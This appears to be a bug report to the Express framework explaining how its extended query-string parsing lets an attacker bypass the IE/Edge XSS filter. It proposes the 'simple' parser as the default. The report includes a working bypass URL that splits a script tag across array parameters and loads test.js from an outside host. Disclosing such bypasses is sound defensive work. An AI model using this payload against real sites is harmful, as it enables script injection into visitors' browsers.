Description
I created a simple browser-based XSS filter test app here:
http://xss.untrusted.com/xss?id=aaa&id=bbb
This page is simple enough that pretty much any filter bypass bug present here would be legitimate. That is, the identified bypass condition would have to be in-scope as an issue for the filter to defend against.
Masato Kinugawa was able to bypass the IE / Edge XSS filter using the following trick:
http://xss.untrusted.com/xss?id[0]=%3Cscript/&id[1]=/src=//html5sec.org/test.js%3E%3C/script%3E
This relies on the extended query string parsing that is enabled by default in express.
I was able to fix my test app by manually disabling the extended query string parsing:
app.set('query parser', 'simple');
While it's certainly not the responsibility of express to make the IE / Edge XSS Filter's job any easier, disabling the extended query parsing by default would be one way to solve this issue for the filter.
Adam Baldwin alerted me to this issue and FWIW he is also in favor of changing the default query parser to 'simple': https://twitter.com/adam_baldwin/status/884633562292428800
Disclosure: Though I'm currently employed by Google, in a previous life I worked at Microsoft developing the IE / Edge XSS Filter.